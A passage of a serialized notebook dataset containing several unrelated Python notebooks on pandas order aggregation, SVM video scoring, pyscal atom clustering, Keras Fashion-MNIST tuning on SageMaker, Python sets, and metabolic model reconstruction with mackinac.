] | null | null | null | 35.20332 | 134 | 0.350155 | [
[
[
"# importing the packages\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
"# reading the csv files\norders = pd.read_csv('orders_test (2).csv')\nstores = pd.read_csv('store_test (2).csv')\ncustomers = pd.read_csv('customer_test (2).csv')",
"_____no_output_____"
]
],
[
[
"1. Create a CSV containing an aggregate table showing the total orders and revenue\neach store had each month. It should have the following columns:\n\nYear (Eg: 2020)\n\nMonth (Eg: January)\n\nStore Name\n\nNumber of Orders\n\nTotal Revenue\n",
"_____no_output_____"
]
],
[
[
"# renaming, creating, merging columns as per required output\nstores.rename(columns={'id':'store_id'},inplace=True)\norders['order_date'] = pd.to_datetime(orders['order_date'])\norders['Year'] = orders['order_date'].apply(lambda x : x.strftime('%Y'))\norders['Month'] = orders['order_date'].apply(lambda x : x.strftime('%B'))\nstore_orders = stores.merge(orders, on=['store_id'], how = 'left')",
"_____no_output_____"
],
[
"store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={\n 'name':'Store Name','id':'Number of Orders','total':'Total revenue'})",
"_____no_output_____"
],
[
"# storing the csv for question 1 reesults\nQ1 = store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={\n 'name':'Store Name','id':'Number of Orders','total':'Total revenue'})\nQ1.to_csv('Q1.csv')",
"_____no_output_____"
]
],
[
[
"2. Create a CSV containing a list of users who have placed less than 10 orders. It should have the following columns:\n\nFirst Name\n\nLast Name\n\nEmail\n\nOrders Placed by user\n",
"_____no_output_____"
]
],
[
[
"# renaming, merging columns as per required output\ncustomers.rename(columns={'id':'customer_id'},inplace=True)\ncustomer_orders = customers.merge(orders,on='customer_id',how='left')\ncustomers_with_orders = customer_orders.groupby(['first_name','last_name','email']).agg({'id':'count'}).reset_index().rename(\n columns={'first_name':'First Name','last_name':'Last Name','email':'Email','id':'Orders Placed by user'})",
"_____no_output_____"
],
[
"# pulling customer info who has ordered less than 10 orders\ncustomers_with_lt_10_orders = customers_with_orders[customers_with_orders['Orders Placed by user'] < 10]",
"_____no_output_____"
],
[
"customers_with_lt_10_orders",
"_____no_output_____"
],
[
"# saving the results of Q2\ncustomers_with_lt_10_orders.to_csv('Q2.csv')",
"_____no_output_____"
]
],
[
[
"3. In question 2, use a MD5 hash to encrypt the emails of the users before converting it to CSV.\n",
"_____no_output_____"
]
],
[
[
"# importing the hash library\nimport hashlib",
"_____no_output_____"
],
[
"# hasing the Email information of customer\ncustomers_with_lt_10_orders['Email']=customers_with_lt_10_orders.Email.apply(lambda x: hashlib.md5(x.encode()).hexdigest())",
"_____no_output_____"
],
[
"customers_with_lt_10_orders ",
"_____no_output_____"
],
[
"# stroing the customer order info with hashed Email information \ncustomers_with_lt_10_orders.to_csv('Q3.csv')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb537b72b3f40830e1dfafb301f8c8429b44ec98 | 11,427 | ipynb | Jupyter Notebook | hw2_code/scripts/.ipynb_checkpoints/scores_canvas-checkpoint.ipynb | codinglara/11775-hws | 1af6f1458234ab2e44940fc78bd9134dc03a3f27 | [
"Apache-2.0"
] | null | null | null | hw2_code/scripts/.ipynb_checkpoints/scores_canvas-checkpoint.ipynb | codinglara/11775-hws | 1af6f1458234ab2e44940fc78bd9134dc03a3f27 | [
"Apache-2.0"
] | null | null | null | hw2_code/scripts/.ipynb_checkpoints/scores_canvas-checkpoint.ipynb | codinglara/11775-hws | 1af6f1458234ab2e44940fc78bd9134dc03a3f27 | [
"Apache-2.0"
] | null | null | null | 32.555556 | 114 | 0.581692 | [
[
[
"#!/bin/python\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport pickle\nimport sys\nimport scipy\nfrom pathlib import Path\nfrom collections import Counter\nimport random\nimport copy\n\n# Machine Learning libraries\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn import svm\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.metrics import average_precision_score\n\n#m_trn_file_path = \"../cnn_bow/cnn_trn.csv\"\n#m_val_file_path = \"../cnn_bow/cnn_val.csv\"\n#m_test_file_path = \"../cnn_bow/cnn_test.csv\"\n\nm_trn_file_path = \"../surf_bow/surf_1000_trn.csv\"\nm_val_file_path = \"../surf_bow/surf_1000_val.csv\"\nm_test_file_path = \"../surf_bow/surf_1000_test.csv\"",
"_____no_output_____"
],
[
"#a_train_df = pd.read_csv(a_trn_file_path, index_col='Unnamed: 0')\n#a_train_df.drop(['target', 'name'], axis=1, inplace=True)\n\nm_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')\nm_train_df.drop(['name'], axis=1, inplace=True)\n\ntrain_df = m_train_df\ntrain_df.target.fillna('P000', inplace=True)\ntrain_df.fillna(0.0, inplace=True)\n\n### tf_idf conversion\n\n# 1. Save target column, and drop if from dataframe\ntrain_df_target = pd.DataFrame(train_df['target'], columns=['target'])\ntrain_df.drop(['target'], axis=1, inplace=True )\n\n# 2. Replace frequencies with tf_idf scores\ntf_transformer = TfidfTransformer(use_idf=True).fit(train_df)\nX_train_tf = tf_transformer.transform(train_df)\ntrain_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)\n\n# 3. Add back the target column\ntrain_df = pd.concat([train_df, train_df_target], axis=1)\n\n#a_test_df = pd.read_csv(a_val_file_path, index_col='Unnamed: 0')\n#a_test_df.drop(['target', 'name'], axis=1, inplace=True)\nm_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')\nm_test_df.drop(['name'], axis=1, inplace=True )\n#test_df = pd.concat([a_test_df, m_test_df], axis=1)\n\ntest_df = m_test_df\ntest_df.target.fillna('P000', inplace=True)\ntest_df.fillna(0.0, inplace=True)\n\n### tf_idf conversion\n\n# 1. Save target column, and drop if from dataframe\ntest_df_target = pd.DataFrame(test_df['target'], columns=['target'])\ntest_df.drop(['target'], axis=1, inplace=True )\n\n# 2. Replace frequencies with tf_idf scores\ntf_transformer = TfidfTransformer(use_idf=True).fit(test_df)\nX_train_tf = tf_transformer.transform(test_df)\ntest_df = pd.DataFrame(X_train_tf.todense(), columns=test_df.columns.values)\n\n# 3. Add back the target column\ntest_df = pd.concat([test_df, test_df_target], axis=1)\n\n# Machine Learning\nprediction_var = list(train_df.columns)\nprediction_var.remove('target')\n#prediction_var.remove('name')\n\n# Get input training data\ntrain_X = train_df[prediction_var]\n\n# Get input target variable\ntrain_y = train_df.target\n\nprint(train_X.shape)\nprint(train_y.shape)",
"(834, 1000)\n(834,)\n"
],
[
"# Machine Learning\nprediction_var = list(test_df.columns)\nprediction_var.remove('target')\n\n# Get test data feature\ntest_X = test_df[prediction_var]\n\n# Get test data target\ntest_y = test_df.target\n\nprint(test_X.shape)\nprint(test_y.shape)",
"(398, 1000)\n(398,)\n"
],
[
"# class_weight='balanced',decision_function_shape = 'ovr',\n\ndict_weights = {'P000':0.0000001, 'P001': 97, 'P002': 24, 'P003': 54}\n\nclf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')\n\n# Fit the model to training\nclf.fit(train_X,train_y)\n\n# Check prediction accuracy\nprediction = clf.decision_function(test_X)\n\nprob_list = prediction[:,1]\nx = np.array([test_y == 'P001'][0]).astype(int)\nprint('P001 &', round(average_precision_score(x,prob_list, pos_label=1),4))\n\nprob_list = prediction[:,2]\nx = np.array([test_y == 'P002'][0]).astype(int)\nprint('P002 &', round(average_precision_score(x,prob_list, pos_label=1),4))\n\nprob_list = prediction[:,3]\nx = np.array([test_y == 'P003'][0]).astype(int)\nprint('P003 &', round(average_precision_score(x,prob_list, pos_label=1),4))",
"P001 & 0.3215\nP002 & 0.4394\nP003 & 0.1098\n"
],
[
"# Train on validation also, for the Canvas submission\n\nm_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')\nm_train_df.drop(['name'], axis=1, inplace=True)\n\nm_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')\nm_test_df.drop(['name'], axis=1, inplace=True )\n\ntrain_df = m_train_df\ntrain_df.target.fillna('P000', inplace=True)\ntrain_df.fillna(0.0, inplace=True)\n\ntest_df = m_test_df\ntest_df.target.fillna('P000', inplace=True)\ntest_df.fillna(0.0, inplace=True)\n\ntrain_df = train_df.append(test_df, ignore_index=True)\n\n### tf_idf conversion\n\n# 1. Save target column, and drop if from dataframe\ntrain_df_target = pd.DataFrame(train_df['target'], columns=['target'])\ntrain_df.drop(['target'], axis=1, inplace=True )\n\n# 2. Replace frequencies with tf_idf scores\ntf_transformer = TfidfTransformer(use_idf=True).fit(train_df)\nX_train_tf = tf_transformer.transform(train_df)\ntrain_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)\n\n# 3. Add back the target column\ntrain_df = pd.concat([train_df, train_df_target], axis=1)\n\n# Get input training data\ntrain_X = train_df[prediction_var]\n\n# Get input target variable\ntrain_y = train_df.target\n\nm_test_df = pd.read_csv(m_test_file_path, index_col='Unnamed: 0')\n\nname_list = m_test_df['name']\n\nm_test_df.drop(['name'], axis=1, inplace=True )\n\ntest_df = m_test_df\ntest_df.target.fillna('P000', inplace=True)\ntest_df.fillna(0.0, inplace=True)\n\n# Machine Learning\nprediction_var = list(test_df.columns)\nprediction_var.remove('target')\n\n# Get test data features\ntest_X = test_df[prediction_var]\n\n# Get test data target\ntest_y = test_df.target\n\nclf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')\n\n# Fit the model to training\nclf.fit(train_X,train_y)\n\nwith open(\"../../all_test.video\", \"r\") as f:\n video_list = f.readlines()\n\n# Check prediction accuracy\nprediction = clf.decision_function(test_X)\n\nprob_list = prediction[:,1]\n\noutput_df = pd.DataFrame({\"VideoID\":name_list, \"Label\":prob_list})\noutput_df = output_df.set_index('VideoID')\ndict1 = output_df.to_dict('index')\nres = []\n\nfor line in video_list:\n vid = line.strip(\"\\n\")\n if(vid in dict1):\n res.append(dict1[vid]['Label'])\n else:\n res.append(0.0)\n\nres = pd.DataFrame(res, columns=None)\nres.to_csv(path_or_buf=\"../scores/\" + str('P001')+\"_cnn.csv\", index=False)\n\nprob_list = prediction[:,2]\noutput_df = pd.DataFrame({\"VideoID\":name_list, \"Label\":prob_list})\noutput_df = output_df.set_index('VideoID')\ndict1 = output_df.to_dict('index')\nres = []\n\nfor line in video_list:\n vid = line.strip(\"\\n\")\n if(vid in dict1):\n res.append(dict1[vid]['Label'])\n else:\n res.append(0.0)\n\nres = pd.DataFrame(res, columns=None)\nres.to_csv(path_or_buf=\"../scores/\" + str('P002')+\"_cnn.csv\", index=False)\n\nprob_list = prediction[:,3]\noutput_df = pd.DataFrame({\"VideoID\":name_list, \"Label\":prob_list})\noutput_df = output_df.set_index('VideoID')\ndict1 = output_df.to_dict('index')\nres = []\n\nfor line in video_list:\n vid = line.strip(\"\\n\")\n if(vid in dict1):\n res.append(dict1[vid]['Label'])\n else:\n res.append(0.0)\n\nres = pd.DataFrame(res, columns=None)\nres.to_csv(path_or_buf=\"../scores/\" + str('P003')+\"_cnn.csv\", index=False)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb537d5cb604295c4153ebc3252d472be9a37e22 | 10,485 | ipynb | Jupyter Notebook | pyscal/part3/05_distinguishing_solid_liquid.ipynb | srmnitc/pyscal-webpage | 451f7c5985a0cc1f1b99681641c79ba3a05ad444 | [
"BSD-3-Clause"
] | 2 | 2020-10-15T02:58:56.000Z | 2020-12-17T01:44:32.000Z | pyscal/part3/05_distinguishing_solid_liquid.ipynb | srmnitc/pyscal-webpage | 451f7c5985a0cc1f1b99681641c79ba3a05ad444 | [
"BSD-3-Clause"
] | 1 | 2021-01-31T01:10:08.000Z | 2021-01-31T04:49:34.000Z | pyscal/part3/05_distinguishing_solid_liquid.ipynb | srmnitc/pyscal-webpage | 451f7c5985a0cc1f1b99681641c79ba3a05ad444 | [
"BSD-3-Clause"
] | 1 | 2021-03-04T16:51:40.000Z | 2021-03-04T16:51:40.000Z | 27.664908 | 573 | 0.598093 | [
[
[
"## Distinction of solid liquid atoms and clustering ",
"_____no_output_____"
],
[
"In this example, we will take one snapshot from a molecular dynamics simulation which has a solid cluster in liquid. The task is to identify solid atoms and cluster them. More details about the method can be found [here](https://pyscal.readthedocs.io/en/latest/solidliquid.html).\n\nThe first step is, of course, importing all the necessary module. For visualisation, we will use [Ovito](https://www.ovito.org/).",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"The above image shows a visualisation of the system using Ovito. Importing modules,",
"_____no_output_____"
]
],
[
[
"import pyscal.core as pc",
"_____no_output_____"
]
],
[
[
"Now we will set up a System with this input file, and calculate neighbors. Here we will use a cutoff method to find neighbors. More details about finding neighbors can be found [here](https://pyscal.readthedocs.io/en/latest/nearestneighbormethods.html#).",
"_____no_output_____"
]
],
[
[
"sys = pc.System()\nsys.read_inputfile('cluster.dump')\nsys.find_neighbors(method='cutoff', cutoff=3.63)",
"_____no_output_____"
]
],
[
[
"Once we compute the neighbors, the next step is to find solid atoms. This can be done using [System.find_solids](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids) method. There are few parameters that can be set, which can be found in detail [here](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids).",
"_____no_output_____"
]
],
[
[
"sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=False)",
"_____no_output_____"
]
],
[
[
"The above statement found all the solid atoms. Solid atoms can be identified by the value of the `solid` attribute. For that we first get the atom objects and select those with `solid` value as True.",
"_____no_output_____"
]
],
[
[
"atoms = sys.atoms\nsolids = [atom for atom in atoms if atom.solid]\nlen(solids)",
"_____no_output_____"
]
],
[
[
"There are 202 solid atoms in the system. In order to visualise in Ovito, we need to first write it out to a trajectory file. This can be done with the help of [to_file](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.to_file) method of System. This method can help to save any attribute of the atom or ant Steinhardt parameter value. ",
"_____no_output_____"
]
],
[
[
"sys.to_file('sys.solid.dat', custom = ['solid'])",
"_____no_output_____"
]
],
[
[
"We can now visualise this file in Ovito. After opening the file in Ovito, the modifier [compute property](https://ovito.org/manual/particles.modifiers.compute_property.html) can be selected. The `Output property` should be `selection` and in the expression field, `solid==0` can be selected to select all the non solid atoms. Applying a modifier [delete selected particles](https://ovito.org/manual/particles.modifiers.delete_selected_particles.html) can be applied to delete all the non solid particles. The system after removing all the liquid atoms is shown below.",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"### Clustering algorithm\n\nYou can see that there is a cluster of atom. The clustering functions that pyscal offers helps in this regard. If you used `find_clusters` with `cluster=True`, the clustering is carried out. Since we did used `cluster=False` above, we will rerun the function",
"_____no_output_____"
]
],
[
[
"sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=True)",
"_____no_output_____"
]
],
[
[
"You can see that the above function call returned the number of atoms belonging to the largest cluster as an output. In order to extract atoms that belong to the largest cluster, we can use the `largest_cluster` attribute of the atom.",
"_____no_output_____"
]
],
[
[
"atoms = sys.atoms\nlargest_cluster = [atom for atom in atoms if atom.largest_cluster]\nlen(largest_cluster)",
"_____no_output_____"
]
],
[
[
"The value matches that given by the function. Once again we will save this information to a file and visualise it in Ovito. ",
"_____no_output_____"
]
],
[
[
"sys.to_file('sys.cluster.dat', custom = ['solid', 'largest_cluster'])",
"_____no_output_____"
]
],
[
[
"The system visualised in Ovito following similar steps as above is shown below.",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"It is clear from the image that the largest cluster of solid atoms was successfully identified. Clustering can be done over any property. The following example with the same system will illustrate this.",
"_____no_output_____"
],
[
"## Clustering based on a custom property",
"_____no_output_____"
],
[
"In pyscal, clustering can be done based on any property. The following example illustrates this. To find the clusters based on a custom property, the [System.clusters_atoms](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.cluster_atoms) method has to be used. The simulation box shown above has the centre roughly at (25, 25, 25). For the custom clustering, we will cluster all atoms within a distance of 10 from the the rough centre of the box at (25, 25, 25). Let us define a function that checks the above condition.",
"_____no_output_____"
]
],
[
[
"def check_distance(atom):\n #get position of atom\n pos = atom.pos\n #calculate distance from (25, 25, 25)\n dist = ((pos[0]-25)**2 + (pos[1]-25)**2 + (pos[2]-25)**2)**0.5\n #check if dist < 10\n return (dist <= 10)",
"_____no_output_____"
]
],
[
[
"The above function would return True or False depending on a condition and takes the Atom as an argument. These are the two important conditions to be satisfied. Now we can pass this function to cluster. First, set up the system and find the neighbors. ",
"_____no_output_____"
]
],
[
[
"sys = pc.System()\nsys.read_inputfile('cluster.dump')\nsys.find_neighbors(method='cutoff', cutoff=3.63)",
"_____no_output_____"
]
],
[
[
"Now cluster",
"_____no_output_____"
]
],
[
[
"sys.cluster_atoms(check_distance)",
"_____no_output_____"
]
],
[
[
"There are 242 atoms in the cluster! Once again we can check this, save to a file and visualise in ovito.",
"_____no_output_____"
]
],
[
[
"atoms = sys.atoms\nlargest_cluster = [atom for atom in atoms if atom.largest_cluster]\nlen(largest_cluster)",
"_____no_output_____"
],
[
"sys.to_file('sys.dist.dat', custom = ['solid', 'largest_cluster'])",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"This example illustrates that any property can be used to cluster the atoms!",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb5398ad90814c7a725735e6d9685631d4f3690c | 7,059 | ipynb | Jupyter Notebook | sdkv2/ch10/model_tuning/Keras on Fashion-MNIST - Automatic Model Tuning + Callbacks.ipynb | dbe-gmbh/Learn-Amazon-SageMaker | 9a16e634c53717631027f540ca1abbd9cd8c653e | [
"MIT"
] | 1 | 2021-04-09T18:28:24.000Z | 2021-04-09T18:28:24.000Z | sdkv2/ch10/model_tuning/Keras on Fashion-MNIST - Automatic Model Tuning + Callbacks.ipynb | dbe-gmbh/Learn-Amazon-SageMaker | 9a16e634c53717631027f540ca1abbd9cd8c653e | [
"MIT"
] | null | null | null | sdkv2/ch10/model_tuning/Keras on Fashion-MNIST - Automatic Model Tuning + Callbacks.ipynb | dbe-gmbh/Learn-Amazon-SageMaker | 9a16e634c53717631027f540ca1abbd9cd8c653e | [
"MIT"
] | 1 | 2021-02-18T10:09:18.000Z | 2021-02-18T10:09:18.000Z | 25.952206 | 105 | 0.52217 | [
[
[
"## Download the Fashion-MNIST dataset",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np\nfrom tensorflow.keras.datasets import fashion_mnist\n\n(x_train, y_train), (x_val, y_val) = fashion_mnist.load_data()\n\nos.makedirs(\"./data\", exist_ok = True)\nnp.savez('./data/training', image=x_train, label=y_train)\nnp.savez('./data/validation', image=x_val, label=y_val)",
"_____no_output_____"
],
[
"!pygmentize fmnist-3.py",
"_____no_output_____"
]
],
[
[
"## Upload Fashion-MNIST data to S3",
"_____no_output_____"
]
],
[
[
"import sagemaker\n\nprint(sagemaker.__version__)\n\nsess = sagemaker.Session()\nrole = sagemaker.get_execution_role()\nbucket = sess.default_bucket()\nprefix = 'keras2-fashion-mnist'\n\ntraining_input_path = sess.upload_data('data/training.npz', key_prefix=prefix+'/training')\nvalidation_input_path = sess.upload_data('data/validation.npz', key_prefix=prefix+'/validation')\noutput_path = 's3://{}/{}/output/'.format(bucket, prefix)\nchk_path = 's3://{}/{}/checkpoints/'.format(bucket, prefix)\n\nprint(training_input_path)\nprint(validation_input_path)\nprint(output_path)\nprint(chk_path)",
"_____no_output_____"
]
],
[
[
"## Train with Tensorflow",
"_____no_output_____"
]
],
[
[
"from sagemaker.tensorflow import TensorFlow\n\ntf_estimator = TensorFlow(entry_point='fmnist-3.py',\n role=role,\n instance_count=1, \n instance_type='ml.p3.2xlarge',\n framework_version='2.1.0', \n py_version='py3',\n hyperparameters={'epochs': 60},\n output_path=output_path,\n use_spot_instances=True,\n max_run=3600, \n max_wait=7200)",
"_____no_output_____"
],
[
"objective_metric_name = 'val_acc'\nobjective_type = 'Maximize'\nmetric_definitions = [\n {'Name': 'val_acc', 'Regex': 'Best val_accuracy: ([0-9\\\\.]+)'}\n]",
"_____no_output_____"
],
[
"from sagemaker.tuner import ContinuousParameter, IntegerParameter\n\nhyperparameter_ranges = {\n 'learning_rate': ContinuousParameter(0.001, 0.2, scaling_type='Logarithmic'), \n 'batch-size': IntegerParameter(32,512)\n}",
"_____no_output_____"
],
[
"from sagemaker.tuner import HyperparameterTuner\n\ntuner = HyperparameterTuner(tf_estimator,\n objective_metric_name,\n hyperparameter_ranges,\n metric_definitions=metric_definitions,\n objective_type=objective_type,\n max_jobs=60,\n max_parallel_jobs=2,\n early_stopping_type='Auto')",
"_____no_output_____"
],
[
"tuner.fit({'training': training_input_path, 'validation': validation_input_path})",
"_____no_output_____"
],
[
"from sagemaker.analytics import HyperparameterTuningJobAnalytics\n\nexp = HyperparameterTuningJobAnalytics(\n hyperparameter_tuning_job_name=tuner.latest_tuning_job.name)\n\njobs = exp.dataframe()\n\njobs.sort_values('FinalObjectiveValue', ascending=0)",
"_____no_output_____"
]
],
[
[
"## Deploy",
"_____no_output_____"
]
],
[
[
"import time\n\ntf_endpoint_name = 'keras-tf-fmnist-'+time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.gmtime())\n\ntf_predictor = tuner.deploy(\n initial_instance_count=1, \n instance_type='ml.m5.large',\n endpoint_name=tf_endpoint_name)",
"_____no_output_____"
]
],
[
[
"## Predict ",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport random\nimport matplotlib.pyplot as plt\n\nnum_samples = 5\nindices = random.sample(range(x_val.shape[0] - 1), num_samples)\nimages = x_val[indices]/255\nlabels = y_val[indices]\n\nfor i in range(num_samples):\n plt.subplot(1,num_samples,i+1)\n plt.imshow(images[i].reshape(28, 28), cmap='gray')\n plt.title(labels[i])\n plt.axis('off')\n\npayload = images.reshape(num_samples, 28, 28, 1)",
"_____no_output_____"
],
[
"response = tf_predictor.predict(payload)\nprediction = np.array(response['predictions'])\npredicted_label = prediction.argmax(axis=1)\nprint('Predicted labels are: {}'.format(predicted_label))",
"_____no_output_____"
]
],
[
[
"## Clean up",
"_____no_output_____"
]
],
[
[
"tf_predictor.delete_endpoint()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53a42738ded5c8a6101c4f9c5d4025027cd9e2 | 2,708 | ipynb | Jupyter Notebook | Sets.ipynb | Sagnik001/Introduction-to-Python | c7fba3c9623c6c7ebe177ad53ef50225626f4d48 | [
"Apache-2.0"
] | 2 | 2020-02-10T10:05:05.000Z | 2020-02-10T10:05:23.000Z | Sets.ipynb | SUVOJIT-DESIGN/Introduction-to-Python | 7a92aceca37d1137404596a94ce5eaa1d9378b02 | [
"Apache-2.0"
] | null | null | null | Sets.ipynb | SUVOJIT-DESIGN/Introduction-to-Python | 7a92aceca37d1137404596a94ce5eaa1d9378b02 | [
"Apache-2.0"
] | 1 | 2020-10-07T11:52:45.000Z | 2020-10-07T11:52:45.000Z | 17.031447 | 68 | 0.417651 | [
[
[
"### Sets",
"_____no_output_____"
]
],
[
[
"{1,2,3}",
"_____no_output_____"
],
[
"{1,2,3,1,2,1,2,3,3,3,3,2,2,2,1,1,2}",
"_____no_output_____"
],
[
"thisset = {\"apple\", \"banana\", \"cherry\"}\n\nthisset.update([\"orange\", \"mango\", \"grapes\"])\n\nprint(thisset)",
"{'banana', 'orange', 'mango', 'cherry', 'grapes', 'apple'}\n"
],
[
"p=(1,2,3,1,2,1,2,3,3,3,3,2,2,2,1,1,1)\ns=set(p)\nprint(s)",
"{1, 2, 3}\n"
],
[
"thisset = {\"apple\", \"banana\", \"cherry\"}\n\nx = thisset.pop()\n\nprint(x)\n\nprint(thisset)",
"cherry\n{'banana', 'apple'}\n"
],
[
"set1 = {\"a\", \"b\" , \"c\"}\nset2 = {1, 2,1, 3}\nprint(set2)\nset3 = set1.union(set2)\nprint(set3)",
"{1, 2, 3}\n{1, 2, 3, 'c', 'a', 'b'}\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53a60d8b0488e87880e947d9f08d15d82ddc70 | 17,667 | ipynb | Jupyter Notebook | bin/generate_recons.ipynb | gregmedlock/iterative_pfba | 7262bcea3f52e68556b7da5a21ac2d7f2adb0cf7 | [
"MIT"
] | 1 | 2020-08-05T13:05:09.000Z | 2020-08-05T13:05:09.000Z | bin/generate_recons.ipynb | medlocklab/iterative_pfba | 7262bcea3f52e68556b7da5a21ac2d7f2adb0cf7 | [
"MIT"
] | null | null | null | bin/generate_recons.ipynb | medlocklab/iterative_pfba | 7262bcea3f52e68556b7da5a21ac2d7f2adb0cf7 | [
"MIT"
] | null | null | null | 38.406522 | 138 | 0.447897 | [
[
[
"import mackinac\nimport cobra\nimport pandas as pd\nimport json\nimport os\nimport numpy as np",
"_____no_output_____"
],
[
"# load ID's for each organisms genome\nid_table = pd.read_table('../data/study_strain_subset_w_patric.tsv',sep='\\t',dtype=str)\nid_table = id_table.replace(np.nan, '', regex=True)\nspecies_to_id = dict(zip(id_table[\"designation in screen\"],id_table[\"PATRIC genome ID\"]))",
"_____no_output_____"
],
[
"id_table",
"_____no_output_____"
],
[
"mackinac.get_token('gregmedlock_seed')\n",
"patric password: ···············\n"
],
[
"# grab and save a universal model to be used later for gapfilling. This is a public template available in Mike Mundy's workspace.\n# The template says \"gramneg\", but there is no difference between the g+ and g- templates other than biomass composition,\n# which will not be used during gapfilling (the GENREs will already have their own biomass function).\ngramneg = mackinac.create_universal_model('/mmundy/public/modelsupport/templates/MicrobialNegativeResolved.modeltemplate')\ncobra.io.save_json_model(gramneg,'../data/universal_mundy.json')",
"_____no_output_____"
],
[
"# save id's and both names in dictionary\nname_to_recon_info = {}\nname_to_gapfill_solution = {}\nfor species in species_to_id.keys():\n # Check for an existing GENRE and make sure there is a PATRIC ID for the strain--\n # if there is no PATRIC ID, the dictionary will have an empty string for that strain.\n if species+'.json' not in os.listdir('../data/modelseed_models') and species_to_id[species]:\n species_id = species_to_id[species]\n\n # reconstruct model; function returns a dictionary with reconstruction info, NOT the model\n print(\"Reconstructing GENRE for \" + species)\n recon_info = mackinac.create_patric_model(species_id,species)\n name_to_recon_info[species] = recon_info\n # Get the reactions contained in the gapfill solution. This is on complete media\n name_to_gapfill_solution[species] = mackinac.get_patric_gapfill_solutions(species)[0]\n # convert to a cobra model\n model = mackinac.create_cobra_model_from_patric_model(species)\n # Save model in json format\n cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'.json')\n \n # Save the model with gapfilled reactions removed\n gapfilled_reactions = name_to_gapfill_solution[species]['reactions'].keys()\n model.remove_reactions(gapfilled_reactions, remove_orphans=True)\n model.repair()\n cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'_gapfill_removed.json')\n\n# save conversion dict for id:original_name:SEED_name mapping\nwith open('../data/patric_recon_info.json','w') as jsonfile:\n json.dump(name_to_recon_info,jsonfile)\n \n# save the gapfill solutions\nwith open('../data/patric_gapfill_solutions.json','w') as jsonfile:\n json.dump(name_to_gapfill_solution,jsonfile)\n ",
"Reconstructing GENRE for B. clarus\nReconstructing GENRE for B. vulgatus HM-720\nReconstructing GENRE for C. saccharolyticum\nReconstructing GENRE for L. lactis\nReconstructing GENRE for L. plantarum\nReconstructing GENRE for P. distasonis\nReconstructing GENRE for P. merdae\nReconstructing GENRE for R. gnavus\n"
],
[
"species_to_id",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
